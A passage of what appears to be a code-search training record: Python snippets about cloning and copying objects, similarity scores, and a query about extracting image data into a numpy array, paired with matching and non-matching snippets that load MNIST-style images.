mJnt.connectChildNode(ml_source[int_index],'scaleJoint','sourceJoint')#Connect\n\n #Name loop\n ml_joints[0].parent = False\n for i,mJnt in enumerate(ml_joints):\n #mJnt.rename(NAMETOOLS.returnCombinedNameFromDict(l_names[i]))\n mJnt.doName()\t\n \n if connectToModule:\n if singleMode:\n connectToModule.connectChildNode(ml_joints[0],connectAs,'rigNull')\n else:\n connectToModule.msgList_connect(connectAs, ml_joints,'rigNull')#connect\t\n return ml_joints", "def clone(self, *args):\n return _osgAnimation.Bone_clone(self, *args)", "def clone(self):", "def addChain(self, chain):\n\n\t\tself.chain.append(chain)\n\t\tchain.parentMolecule = self", "def duplicate(self, to_robot=None):\n _robot = self._related_robot_instance\n self.unlink_from_robot()\n out = deepcopy(self)\n if _robot is not None:\n self.link_with_robot(_robot)\n if to_robot is not None:\n out.link_with_robot(to_robot)\n return out", "def __copy__(self):\n #new = MCTS(copy=True) # don't run _predict() twice\n new = MCTS(self.env, copy=True) # don't set pi and Q twice\n new.env = self.env.__copy__()\n # can't use __dict__.update() without effecting env __copy__()\n # in theory, you don't need to copy the env. just use one copy for simulating, and restore it to root\n # since _Q() evaluates the env.done() of children, you need self.done = env.done() in __init__()\n # same for env.winner\n new.pi = []\n new. Q = 0\n new.net = self.net\n new.t = self.t\n new.expl = self.expl\n new.children = []\n new.parent = None\n return new", "def copy(self):\n return self.__class__(\n self.kind, self.link_ids.copy(), self.included_nodes.copy(), self.mass,\n self.name, self.crossring_cleavages.copy(), self.composition.copy())", "def clone(self):\n screen = self.screen\n self._newLine(self._drawing)\n\n Myturtle = self.Myturtle\n self.screen = None\n self.Myturtle = None # too make self deepcopy-able\n\n q = deepcopy(self)\n\n self.screen = screen\n self.Myturtle = Myturtle\n\n q.screen = screen\n q.Myturtle = _TurtleImage(screen, self.Myturtle.shapeIndex)\n\n screen._turtles.append(q)\n ttype = screen._shapes[self.Myturtle.shapeIndex]._type\n if ttype == \"polygon\":\n q.Myturtle._item = screen._createpoly()\n elif ttype == \"image\":\n q.Myturtle._item = screen._createimage(screen._shapes[\"blank\"]._data)\n elif ttype == \"compound\":\n q.Myturtle._item = [screen._createpoly() for item in\n screen._shapes[self.Myturtle.shapeIndex]._data]\n q.currentLineItem = screen._createline()\n q._update()\n return q", "def clone(self):\n return _libsbml.Association_clone(self)", "def T_joint_chain(self, joint_name):\n if self.joint_syms[joint_name].get(\"T_joint\") is None:\n # go up the parent chain of transformations\n parent_joint_name = self.global_syms[\"Jname2parentJname\"].get(\n joint_name)\n if parent_joint_name is None:\n self.joint_syms[joint_name][\"T_joint\"] = \\\n self.joint_syms[joint_name][\"Tlocal_joint\"]\n else:\n self.joint_syms[joint_name][\"T_joint\"] = (\n self.T_joint_chain(parent_joint_name)\n * self.joint_syms[joint_name][\"Tlocal_joint\"]\n )\n return self.joint_syms[joint_name][\"T_joint\"]", "def copy(self):\n new = self.__class__()\n do_not_copy_by_ref = {\"alleles\", \"strains\", \"base_cobra_model\", \"notes\",\n \"annotation\"}\n for attr in self.__dict__:\n if attr not in do_not_copy_by_ref:\n new.__dict__[attr] = self.__dict__[attr]\n new.notes = deepcopy(self.notes)\n new.annotation = deepcopy(self.annotation)\n\n new.alleles = DictList()\n do_not_copy_by_ref = {\"_strains\", \"_model\"}\n for allele in self.alleles:\n new_allele = allele.__class__()\n for attr, value in iteritems(allele.__dict__):\n if attr not in do_not_copy_by_ref:\n new_allele.__dict__[attr] = copy(\n value) if attr == \"formula\" else value\n new_allele._model = new\n new.alleles.append(new_allele)\n\n new.strains = DictList()\n do_not_copy_by_ref = {\"_model\", \"_alleles\", \"_base_cobra_model\"}\n for strain in self.strains:\n new_strain = strain.__class__()\n for attr, value in iteritems(strain.__dict__):\n if attr not in do_not_copy_by_ref:\n new_strain.__dict__[attr] = copy(value)\n new_strain._model = new\n new.strains.append(new_strain)\n # update awareness\n for allele, stoic in iteritems(strain._alleles):\n new_allele = new.alleles.get_by_id(allele.id)\n new_strain._alleles[new_allele] = stoic\n new_allele._strain.add(new_strain)\n # it doesn't make sense to retain the context of a copied model so\n # assign a new empty context\n new._contexts = list()", "def copy(self, newname=None):\n\n if not newname: newname = self.name + \"_copy\"\n newmol=Protein(name=newname, parent=self.parent,\n elementType=self.elementType, childrenName=self.childrenName,\n setClass=self.setClass, childrenSetClass=self.childrenSetClass,\n top=self.top)\n newmol.curChain=Chain()\n newmol.curRes=Residue()\n newmol.allAtoms= AtomSet()\n newmol.parser = self.parser\n for at in self.allAtoms:\n self._fit_atom_into_tree(newmol, at)\n newmol.buildBondsByDistance()\n return newmol", "def __deepcopy__(self, memo):\n chain = Chain(model_id = self.model_id,\n chain_id = self.chain_id)\n for fragment in self.fragment_list:\n chain.add_fragment(copy.deepcopy(fragment, memo), True)\n return chain", "def deep_copy(self):\n return self.__class__(self.inputs, self.outputs, self.middle)", "def op_dup(self, args):\n self.require_stack(1)\n self.stack.append(self.stack[-1])", "def duplicate(self):\n\t\treturn Graph(self.vertices[:], self.edges[:])", "def trip_chain(self):\n pass", "def clone(self):\n return self.__class__(self.name, *self)", "def duplicate(*args, inputConnections: bool=True, instanceLeaf: bool=True, name: AnyStr=\"\",\n parentOnly: bool=True, renameChildren: bool=True, returnRootsOnly: bool=True,\n smartTransform: bool=True, transformsOnly: bool=True, upstreamNodes: bool=True,\n **kwargs)->List[AnyStr]:\n pass", "def clone(self):\n newlist = []\n for a in self.actors:\n newlist.append(a.clone())\n return Assembly(newlist)", "def clone(self):\n return _libsbml.XMLTriple_clone(self)", "def clone(self):\n return _libsbml.GeneProductAssociation_clone(self)", "def copy(self):\n model_copy = BayesianModel()\n model_copy.add_nodes_from(self.nodes())\n model_copy.add_edges_from(self.edges())\n if self.cpds:\n model_copy.add_cpds(*[cpd.copy() for cpd in self.cpds])\n return model_copy", "def clone(self, replica=None):\n\n\t\tif replica == None:\n\t\t\treplica = Molecule()\n\n\t\treplica.copy(self)\n\n\t\tfor chain in self.chain:\n\t\t\tnewchain = chain.clone()\n\t\t\treplica.addChain(newchain)\n\n\t\treturn replica", "def copy(self):\n new_chain = []\n for block in self.chain:\n if block.index == 0:\n new_chain.append(self.create_genesis())\n else:\n new_block = Block()\n new_block.deserialize(block.serialize())\n new_chain.append(new_block)\n\n return BlockChain(new_chain)", "def test_deepcopy(self):\n t = Compose([Enumerate([2, \"asfa\", \"ipsi\"]), OneHotEncode(3)], \"categorical\")\n t.transform([2])\n copy.deepcopy(t)", "def W_joint_chain(self, joint_name):\n if self.joint_syms[joint_name].get(\"W\") is None:\n # go up the parent chain of transformations\n parent_joint_name = self.global_syms[\"Jname2parentJname\"].get(\n joint_name)\n if parent_joint_name is None:\n self.joint_syms[joint_name][\"W\"] = \\\n self.joint_syms[joint_name][\"q_rpy\"]\n else:\n self.joint_syms[joint_name][\"W\"] = (\n self.W_joint_chain(parent_joint_name)\n + self.joint_syms[joint_name][\"q_rpy\"]\n )\n return self.joint_syms[joint_name][\"W\"]", "def polyDuplicateAndConnect(*args, removeOriginalFromShaders: bool=True, renameChildren:\n bool=True, **kwargs)->None:\n pass", "def clone(self):\n raise NotImplementedError", "def _chain(self, **kwargs):\n obj = self._clone()\n obj.__dict__.update(kwargs)\n return obj", "def subdDuplicateAndConnect(*args, **kwargs)->None:\n pass", "def duplicate(self, duplicate):\n\n self._duplicate = duplicate", "def duplicate_slide(source, target, index):\n source_slide = source.slides[index]\n blank_slide_layout = _get_blank_slide_layout(target)\n dest = target.slides.add_slide(blank_slide_layout)\n\n for shape in source_slide.shapes:\n newel = deepcopy(shape.element)\n dest.shapes._spTree.insert_element_before(newel, 'p:extLst')", "def clone(self):\n sc=copy.copy(self)\n sc.farms=list()\n for f in self.farms:\n sc.farms.append(f.clone(f.name, f.size))\n sc.airborne=list()\n for a in self.airborne:\n sc.airborne.append(a.clone(a.farma, a.farmb, a.distance))\n return sc", "def _interconnect(self):\n self.clear_structure()\n self.structure.append(self.source)\n for i in range(len(self.stack)):\n self.structure.append(self.stack[i])\n self.structure.append(self.terminator)\n return", "def clone(self) -> \"Activation\":\n clone = Activation()\n clone.package = self.package\n clone.identifiers = self.identifiers.clone()\n return clone", "def joint(self):\n return GraphModel(self.factors).joint()", "def crossover (self, p1, p2, p_pop, c1, c2, c_pop) :\n assert self.crossover_count < self.pop_size\n assert self.get_iteration () == self.last_gen\n self.parents.append (p1)\n self.parents.append (p2)\n self.crossover_count += 2\n if self.crossover_count == self.pop_size :\n assert (self.get_iteration () == self.last_gen)\n print (self.get_iteration ())\n sys.stdout.flush ()\n self.build_model (p_pop)\n self.sample_model (c1, c2, c_pop)\n self.crossover_count = 0\n self.parents = []\n self.children = {}\n self.last_gen += 1\n self.clear_cache ()", "def copy(self, exterior=None, label=None, **kwargs):\n return self.deepcopy(exterior=exterior, label=label, **kwargs)", "def duplicate(self, delayed):\n return self.__class__(delayed)", "def test_BuildModel1(self):\n print(\"\\nTest 5: Building a Model with cloning\")\n builder = StaticBuilder(\"Clone\")\n in1 = builder.addInput(10)\n enc1 = builder.addInner(3)\n out1 = builder.addOutput(name=\"Out1\")\n out2 = builder.addOutput(name=\"Out2\")\n \n builder.addDirectedLink(in1, enc1)\n builder.addDirectedLink(enc1, out1)\n builder.addDirectedLink(enc1, out2)\n \n builder.build()", "def clone(self):\n return self", "def __copy__(self):\r\n other = self.__class__(\r\n linkers=[copy(l) for l in self.linkers],\r\n wrapper=self.wrapper)\r\n return other", "def chain_new(ctx, chain_name):\n project = ctx.obj['PROJECT']\n new_local_chain(project.project_dir, chain_name)", "def addJointMoverToOutliner(self):\n\n pass", "def copy(self):\n new = self.__class__(integration=None, data=None)\n for attribute, value in self.__dict__.items():\n if attribute in self.referenced_attributes:\n setattr(new, attribute, value)\n elif hasattr(value, 'copy'):\n setattr(new, attribute, value.copy())\n else:\n setattr(new, attribute, deepcopy(value))\n return new", "def clone(self):\n\n clone = self.__class__.__new__(self.__class__)\n clone._graph_state = self._graph_state\n clone._molecule_state = self._molecule_state\n return clone", "def __duplicate_o2o_fields(self, duplicate):\n for f in self._meta.related_objects:\n if f.one_to_one:\n if any(\n [\n f.name in self._clone_o2o_fields\n and f not in self._meta.concrete_fields,\n self._clone_excluded_o2o_fields\n and f.name not in self._clone_excluded_o2o_fields\n and f not in self._meta.concrete_fields,\n ]\n ):\n rel_object = getattr(self, f.name, None)\n if rel_object:\n new_rel_object = CloneMixin._create_copy_of_instance(\n rel_object,\n force=True,\n sub_clone=True,\n )\n setattr(new_rel_object, f.remote_field.name, duplicate)\n new_rel_object.save()\n\n return duplicate", "def make_clone(self, attrs=None, sub_clone=False):\n attrs = attrs or {}\n if not self.pk:\n raise ValidationError(\n \"{}: Instance must be saved before it can be cloned.\".format(\n self.__class__.__name__\n )\n )\n if sub_clone:\n duplicate = self\n duplicate.pk = None\n else:\n duplicate = self._create_copy_of_instance(self)\n\n for name, value in attrs.items():\n setattr(duplicate, name, value)\n\n duplicate.save()\n\n duplicate = self.__duplicate_o2o_fields(duplicate)\n duplicate = self.__duplicate_o2m_fields(duplicate)\n duplicate = self.__duplicate_m2o_fields(duplicate)\n duplicate = self.__duplicate_m2m_fields(duplicate)\n return duplicate", "def clone(self):\n raise GAError, 'must define clone() in your genome class'", "def clone(self):\n return _libsbml.Objective_clone(self)", "def copy(self):", "def duplicate(self):\n\n return Note(self.nbr, self.length, self.vel)", "def newChain(self):\n\n\t\tmychain = Chain()\n\t\tself.addChain(mychain)\n\t\treturn mychain", "def add_chain(self, chain, delay_sort=False):\n assert isinstance(chain, Chain)\n\n if self.chain_dict.has_key(chain.chain_id):\n raise ChainOverwrite()\n\n self.chain_list.append(chain)\n self.chain_dict[chain.chain_id] = chain\n chain.model = self\n\n if not delay_sort:\n self.chain_list.sort()", "def DuplicateObject(self, node, new_obj_name):\n self.Add(node.object_module.GetName(), new_obj_name, obj=node.GetObject())\n node.ClearObject()", "def copy(self):\n return self.__class__(*self.sets)", "def duplicate(self):\r\n graph = DistanceGraph(self.size)\r\n for node in self.edges:\r\n for edge in self.edges[node]:\r\n graph.edges[node][edge] = self.edges[node][edge]\r\n return graph", "def adapt_chain(chain):\n type_chain = check_type(chain)\n name = chain.id\n if type_chain == \"nucleic_acid\":\n new_chain = Bio.PDB.Chain.Chain(name)\n chain = copy.copy(chain)\n for residue in chain:\n new_chain.add(residue.copy())\n\n for residue in new_chain:\n for atom in residue:\n if atom.id == \"C1'\":\n atom.id = \"CA\"\n residue.add(atom.copy())\n return new_chain\n else:\n return chain", "def chain_graph(self) -> nx.DiGraph:\n edg_lst = [\n (f\"p{idx}\", f\"p{idx+1}\", self.a[f\"p{idx+1}\"]) for idx in range(self.n)\n ]\n chain_graph = nx.DiGraph()\n chain_graph.add_weighted_edges_from(edg_lst)\n return chain_graph", "def clone(self):\n return self.__class__(self, self.spectrum, wallet=self.wallet)", "def clone(self) -> Mutator:\n raise NotImplementedError", "def clone(self):\n return _libsbml.GeneAssociation_clone(self)", "def connectJoint(*args, connectMode: bool=True, parentMode: bool=True, **kwargs)->None:\n pass", "def _clone_rip(self, memo):\n # references lists of definitions need to be vacated except those that were cloned.\n for definition in self._definitions:\n new_references = set()\n for ref in definition._references:\n if ref in memo.values():\n new_references.add(ref)\n for instance in definition._children:\n instance._reference._references.add(instance)\n\n definition._references = new_references", "def copy(self):\n return MultiterminalDevice(\n self.center.copy(),\n list(i.copy() for i in self.leads),\n list(i.copy() for i in self.connections),\n )", "def duplicate(self, dropped):\n return self.__class__(dropped, self.message)", "def append(self, traj):\n if hasattr(traj, 'trajid'):\n self.trajectories.append(traj)\n self.trajids.append(traj.trajid)\n self.trajcount = len(self.trajectories)", "def clone(self):\n return None", "def clone(self):\n return _libsbml.FbcAssociation_clone(self)", "def cloneType(self):\n return _osgAnimation.Bone_cloneType(self)", "def chain_graph(self) -> nx.DiGraph:\n edg_lst = [\n (f\"p{idx}\", f\"p{idx+1}\", self.d[f\"p{idx+1}\"]) for idx in range(self.n)\n ]\n chain_graph = nx.DiGraph()\n chain_graph.add_weighted_edges_from(edg_lst)\n return chain_graph", "def add(self, member, clone=True):\n if type(member)==Member:\n if clone:\n member = dict([(x,y) for x,y in member.getMember().items()])\n else:\n if self.head:\n self.tail.setLink(member)\n self.tail = member\n else:\n self.tail = member\n self.head = member \n if type(member)==dict:\n temp = Member()\n temp.setMember(member)\n member = temp\n if self.head:\n self.tail.setLink(member)\n self.tail = member\n else:\n self.tail = member\n self.head = member", "def test_check_duplication_entry_at_restoring_one_chain(self):\n ref_entity = Entity.objects.create(name=\"ReferredEntity\", created_user=self._user)\n ref_entries = [\n Entry.objects.create(name=\"ref-%d\" % i, created_user=self._user, schema=ref_entity)\n for i in range(3)\n ]\n\n # initialize EntityAttrs\n attr_info = {\n \"obj\": {\"type\": AttrTypeValue[\"object\"], \"value\": ref_entries[0]},\n \"arr_obj\": {\n \"type\": AttrTypeValue[\"array_object\"],\n \"value\": ref_entries[1:],\n },\n }\n for attr_name, info in attr_info.items():\n # create EntityAttr object with is_delete_in_chain object\n attr = EntityAttr.objects.create(\n name=attr_name,\n type=info[\"type\"],\n is_delete_in_chain=True,\n created_user=self._user,\n parent_entity=self._entity,\n )\n\n if info[\"type\"] & AttrTypeValue[\"object\"]:\n attr.referral.add(ref_entity)\n\n self._entity.attrs.add(attr)\n\n # initialize target entry\n entry = Entry.objects.create(name=\"entry\", schema=self._entity, created_user=self._user)\n entry.complement_attrs(self._user)\n\n for attr_name, info in attr_info.items():\n attr = entry.attrs.get(schema__name=attr_name)\n attr.add_value(self._user, info[\"value\"])\n\n # delete target entry at first\n entry.delete()\n\n # create same name entry\n Entry.objects.create(name=\"ref-1\", created_user=self._user, schema=ref_entity)\n\n # check duplicate entry\n ret = entry.check_duplication_entry_at_restoring(entry_chain=[])\n self.assertTrue(ret)", "def copy(self) -> 'Line':\n new = Line([cell.copy() for cell in self.cells], self.player)\n new.player_1, new.player_2 = self.player_1, self.player_2\n return new", "def clone(self):\n cloned = Graph()\n for v in self.vertices:\n cloned.vertices[v] = self.vertices[v].clone()\n return cloned", "def copy(self):\n return self.__class__(self.name, list(self.gRNAs))", "def clone_setup(self, setup_id):\n setup = Setup.objects.get(id=setup_id)\n setup.pk = None # copy all fields except the primary key (id)\n setup.date = datetime.now()\n\n i = 1\n\n while len(Setup.objects.filter(name=setup.name + \" (\" + str(i) + \")\")) != 0:\n i = i + 1\n\n setup.name += \" (\" + str(i) + \")\"\n\n if setup.status == \"final\":\n setup.status = \"draft\"\n setup.save()\n\n new_subspaces = Subspace.objects.filter(setup_id=setup_id)\n\n for subspace in new_subspaces:\n subspace.setup_id = setup\n subspace.pk = None\n subspace.save()\n\n return Setup.objects.get(pk=setup.pk)", "def copy(self):\n return self.__class__(**vars(self))", "def add_chain_to_model(chain, model, atoms):\n\n if chain[\"type\"] == \"polymer\" or chain[\"type\"] == \"branched\":\n polymer = {\n \"internal_id\": chain[\"internal_id\"], \"sequence\": chain[\"sequence\"],\n \"helices\": [], \"strands\": [], \"residues\": {}\n }\n for i, group in enumerate(chain[\"groups\"], start=1):\n add_het_to_dict(group, chain, atoms, polymer[\"residues\"], number=i)\n add_ss_to_chain(polymer)\n model[\"polymer\"][chain[\"id\"]] = polymer\n else:\n for group in chain[\"groups\"]:\n add_het_to_dict(group, chain, atoms, model[chain[\"type\"]])", "def remember_copy(self, original_name, new_name):\n\n if not any(History.try_add_child(branch, original_name, new_name) for branch in self.__history):\n new_branch = History.new_node(original_name)\n History.try_add_child(new_branch, original_name, new_name)\n self.__history.append(new_branch)", "def insert_chain(G, A, B, n):\r\n # Convert A and B node to str if necessary\r\n if not isinstance(A, str) or not isinstance(B, str):\r\n A = str(A)\r\n B = str(B)\r\n\r\n chain = nx.path_graph(n) # Create chain of repeaters of length n\r\n\r\n # Get position of A and B, and find the distance between each repeater\r\n posA = nx.get_node_attributes(G, 'pos')[A]\r\n posB = nx.get_node_attributes(G, 'pos')[B]\r\n step = np.subtract(posB, posA)\r\n\r\n # Assign position to each repeater\r\n repeater_distance = np.round(step / (n + 1), 10)\r\n try:\r\n pert = global_file.params.pert\r\n except AttributeError:\r\n pert = 0\r\n for i in chain.nodes():\r\n posNode = np.add(posA, np.multiply((i + 1), repeater_distance))\r\n x_offset = random.uniform(-pert, pert)\r\n y_offset = random.uniform(-pert, pert)\r\n chain.nodes[i]['pos'] = tuple(np.around(np.add(posNode, (x_offset, y_offset)), 4))\r\n # Create new chain with nodes AB1, AB2,... ABN\r\n named_nodes = [A + B + str(i + 1) for i in chain.nodes()]\r\n # Create mapping from old node names to new names\r\n mapping = dict(zip(chain.nodes(), named_nodes))\r\n # Relabel the node names of the chain\r\n chain = nx.relabel_nodes(chain, mapping)\r\n\r\n # First remove the long edge connecting A and B, and replace by repeater\r\n # chain\r\n G.remove_edge(str(A), str(B))\r\n # Add the edges from the chain including properties to the graph G\r\n G.add_edges_from(chain.edges(data=True))\r\n # Add the nodes from the chain including properties to the graph G\r\n G.add_nodes_from(chain.nodes(data=True))\r\n\r\n # Connect the chain to the graph by connecting A to AB1 and ABN to B\r\n G.add_edges_from([(str(A), str(A) + str(B) + '1'),\r\n (str(B), str(A) + str(B) + str(n))])\r\n\r\n return G", "def copy(self):\n return type(self)(self.parent(), self._express)", "def copy(self):\n cls = self.__class__\n new_graph = cls.__new__(cls)\n new_graph._nodes = self._nodes[:]\n new_graph._node_wip = self._node_wip[:]\n new_graph._edges = self._edges[:]\n if self._sorted_nodes:\n new_graph._sorted_nodes = self._sorted_nodes[:]\n else:\n new_graph._sorted_nodes = None\n new_graph.predecessors = {}\n for key, val in self.predecessors.items():\n new_graph.predecessors[key] = self.predecessors[key][:]\n new_graph.successors = {}\n for key, val in self.successors.items():\n new_graph.successors[key] = self.successors[key][:]\n return new_graph", "def add_clone(self, dest, source=None):\n raise NotImplementedYet()", "def clone(self):\n return _libsbml.FluxObjective_clone(self)", "def Clone(self):\n return _gmat_py.NadirPointing_Clone(self)", "def test_deepcopy(self):\n t = Identity()\n t.transform([2])\n copy.deepcopy(t)", "def test_deepcopy(self):\n t = Precision()\n t.transform([2])\n copy.deepcopy(t)", "def copy(self):\n return PathPoint(self.species.new_species(), deepcopy(self.constraints))", "def _replicate_class(self, **kwargs):\n return Posterior(**kwargs)", "def clone(self):\n return _libsbml.ModelCreator_clone(self)", "def clone(self):\n # copy an instance of the class\n clone = empty_copy(self)\n\n for k in self.__dict__.keys():\n if k not in [\"move_stack\", \"_stack\"]:\n setattr(clone, k, self.__dict__[k])\n else:\n setattr(clone, k, [])\n\n clone.occupied_co = deepcopy(self.occupied_co)\n\n return clone", "def test_deepcopy(self):\n t = Quantize()\n t.transform([2])\n copy.deepcopy(t)", "def duplicateNode(self):\n\n try:\n self.__duplicate(nuke.selectedNode())\n except:\n nuke.message(\"Error - no node selected\")", "def add_link(self, other):\r\n self.neighbors.append(other)\r\n other.neighbors.append(self)", "def gapJunctionWith(self, otherObject, *args, **keywordArgs):\n \n from neuron import Neuron\n if isinstance(otherObject, Neuron) and otherObject.network == self.network:\n otherNeurite = otherObject.extendNeurite()\n elif isinstance(otherObject, Neurite) and otherObject.network == self.network:\n otherNeurite = otherObject\n else:\n raise ValueError, 'Gap junctions can only be made with neurons or neurites in the same network.'\n gapJunction = GapJunction(self.network, self, otherNeurite, *args, **keywordArgs)\n self._gapJunctions += [gapJunction]\n otherNeurite._gapJunctions += [gapJunction]\n self.network.addObject(gapJunction)\n return gapJunction", "def clone_graph(source_graph, target_graph=None, identifier=None):\n if target_graph is None:\n g = rdflib.Graph(identifier=identifier)\n for p, n in source_graph.namespace_manager.namespaces():\n g.namespace_manager.bind(p, n, override=True, replace=True)\n else:\n g = target_graph\n for p, n in source_graph.namespace_manager.namespaces():\n g.namespace_manager.bind(p, n, override=False, replace=False)\n for t in iter(source_graph):\n g.add(t)\n return g", "def __deepcopy__(self, others={}):\n miniMe = self.__class__.__new__(self.__class__)\n others[id(self)] = miniMe\n for key, val in self.__dict__.items():\n if id(val) in others:\n setattr(miniMe, key, others[id(val)])\n else:\n new = deepcopy(val, others)\n others[id(val)] = new\n setattr(miniMe, key, new)\n if miniMe.package:\n miniMe._addOurselvesToPackage(self.path)\n return miniMe" ]
[ "0.63030636", "0.6269034", "0.60625374", "0.58090156", "0.5777003", "0.57204974", "0.56585926", "0.55766195", "0.5560866", "0.55120313", "0.5510162", "0.54400694", "0.5433781", "0.54283494", "0.5389344", "0.5383912", "0.53801215", "0.53679395", "0.5365678", "0.5365056", "0.53536135", "0.53531176", "0.5330423", "0.5328828", "0.5323335", "0.5277563", "0.52724487", "0.52718264", "0.52692497", "0.5265826", "0.52514803", "0.5247242", "0.5241791", "0.5224864", "0.52229595", "0.5221577", "0.52143764", "0.5208162", "0.52070653", "0.5202716", "0.52009374", "0.5199416", "0.5198552", "0.5183921", "0.51799387", "0.517841", "0.5168683", "0.51470065", "0.51432586", "0.5134406", "0.51312244", "0.5127607", "0.5123178", "0.51197886", "0.5113165", "0.5111288", "0.5100488", "0.50896716", "0.5076351", "0.5073096", "0.50609595", "0.50560826", "0.50430036", "0.50412893", "0.5040321", "0.503996", "0.5039583", "0.5035546", "0.5028805", "0.50232285", "0.5019607", "0.5006594", "0.5006118", "0.50019854", "0.49962887", "0.49947977", "0.49915105", "0.49901", "0.4981155", "0.49781415", "0.4968591", "0.4957498", "0.49459642", "0.49418178", "0.49391577", "0.49355814", "0.49345753", "0.49338016", "0.4932179", "0.49312863", "0.4930886", "0.4929403", "0.49292108", "0.4928554", "0.49270058", "0.4925003", "0.4916579", "0.49124882", "0.49092108", "0.49075106" ]
0.6813391
0
Extract the images into a 4D uint8 numpy array [index, y, x, depth].
def extract_images(filename,lx): print('Extracting', filename,'aaaaaa') data=numpy.loadtxt(filename,dtype='int64') dim=data.shape[0] data=data.reshape(dim, lx, lx, 1) # Convert shape from [num examples, rows, columns, depth] # to [num examples, rows*columns] (assuming depth == 1) data = data.reshape(data.shape[0], data.shape[1] * data.shape[2]) # Convert from [0, 255] -> [0.0, 1.0]. data = data.astype(numpy.float64) # images = numpy.multiply(images, 1.0 / 255.0) # commented since it is ising variables data = numpy.multiply(data, 1.0 ) # multiply by one, instead print(data.shape) return data
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _images(path):\r\n with gzip.open(path) as f:\r\n # First 16 bytes are magic_number, n_imgs, n_rows, n_cols\r\n pixels = np.frombuffer(f.read(), 'B', offset=16)\r\n return pixels.reshape(-1, 784).astype('float32') / 255", "def extract_data(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(16)\n buf = bytestream.read(IMAGE_SIZE * IMAGE_SIZE * num_images)\n data = np.frombuffer(buf, dtype=np.uint8).astype(np.float32)\n data = (data - (PIXEL_DEPTH / 2.0)) / PIXEL_DEPTH\n data = data.reshape(num_images, IMAGE_SIZE, IMAGE_SIZE, 1)\n return data", "def extract_data(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(16)\n buf = bytestream.read(IMAGE_SIZE * IMAGE_SIZE * num_images * NUM_CHANNELS)\n data = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.float32)\n# data = (data - (PIXEL_DEPTH / 2.0)) / PIXEL_DEPTH\n data = data.reshape(num_images, IMAGE_SIZE * IMAGE_SIZE)\n return data", "def image_batch():\n return np.zeros((2, 1, 4, 4))", "def extract_data(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(16)\n buf = bytestream.read(IMAGE_SIZE * IMAGE_SIZE * num_images * NUM_CHANNELS)\n data = np.frombuffer(buf, dtype=np.uint8).astype(np.float32)\n data = (data - (PIXEL_DEPTH / 2.0)) / PIXEL_DEPTH\n data = data.reshape(num_images, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS)\n return data", "def extract_data(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(16)\n buf = bytestream.read(IMAGE_SIZE * IMAGE_SIZE * num_images * NUM_CHANNELS)\n data = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.float32)\n data = (data - (PIXEL_DEPTH / 2.0)) / PIXEL_DEPTH\n data = data.reshape(num_images, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS)\n return data", "def _extract_images(self, filename):\n log.info('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = self._read32(bytestream)\n if magic != 2051:\n raise ValueError(\n 'Invalid magic number %d in MNIST image file: %s' %\n (magic, filename))\n num_images = self._read32(bytestream)\n rows = self._read32(bytestream)\n cols = self._read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def imgsz(self) -> np.ndarray:\n return self._vector[6:8].astype(int)", "def depr_depth_images(self):\n if not hasattr(self, '_depr_depth_images'):\n depth_images = self._archive['gaps_depth']\n self._depr_depth_images = depth_images.reshape([1, 20, 224, 224, 1])\n return self._depr_depth_images", "def extract_data(filename, num_images, IMAGE_WIDTH):\n\n# this function definition has been taken from internet\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(16)\n buf = bytestream.read(IMAGE_WIDTH * IMAGE_WIDTH * num_images)\n data = np.frombuffer(buf, dtype=np.uint8).astype(np.float32) #Interpret a buffer as a 1-dimensional array\n data = data.reshape(num_images, IMAGE_WIDTH*IMAGE_WIDTH)\n return data", "def get_img_array(myzipfile, imgid, shape=(299,299)):\n img_arr = np.zeros(shape=(512, 512, 3), dtype=np.float32)\n img_green = Image.open(myzipfile.open(f'{imgid}_green.png'))\n img_blue = Image.open(myzipfile.open(f'{imgid}_blue.png'))\n img_red = Image.open(myzipfile.open(f'{imgid}_red.png'))\n img_yellow = Image.open(myzipfile.open(f'{imgid}_yellow.png'))\n img_arr[:,:,0] = np.divide(np.array(img_green), 255)\n img_arr[:,:,1] = np.divide(np.array(img_blue), 255)/2 + np.divide(np.array(img_yellow), 255)/2\n img_arr[:,:,2] = np.divide(np.array(img_red), 255)/2 + np.divide(np.array(img_red), 255)/2\n img_arr = cv2.resize(img_arr, shape)\n return img_arr", "def _extract_images(image_paths):\n\n num_images = len(image_paths)\n data = np.zeros((num_images, _IMAGE_SIZE, _IMAGE_SIZE, _NUM_CHANNELS))\n for i in range(num_images):\n image_path = image_paths[i]\n print('Extracting images from: ', image_path)\n image = imageio.imread(image_path)\n data[i] = image\n\n return data", "def pix2pix_results_to_frames(img_array):\n frames = []\n\n for i in range(int(len(img_array)/3)):\n\n try:\n left = cv2.resize(img_array[i * 3], dsize=(512, 512), interpolation=cv2.INTER_NEAREST)\n right = cv2.resize(img_array[i * 3 + 2], dsize=(512, 512), interpolation=cv2.INTER_NEAREST)\n\n scale = 512/img_array[i * 3 + 1].shape[0]\n middle = cv2.resize(img_array[i * 3 + 1], (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_NEAREST)\n\n frames.append(np.concatenate((left, middle, right), axis=1))\n\n frames.append(img_array[i * 3+1])\n except:\n print(\"Error\")\n\n return frames", "def extract_images(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError(\n 'Invalid magic number %d in MNIST image file: %s' %\n (magic, filename))\n num_images = _read32(bytestream)[0]\n rows = _read32(bytestream)[0]\n cols = _read32(bytestream)[0]\n #print('check', magic, num_images, rows, cols, rows * cols * num_images)\n buf = bytestream.read(rows * cols * num_images)\n data = numpy.frombuffer(buf, dtype=numpy.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def _convert_images(raw):\n # 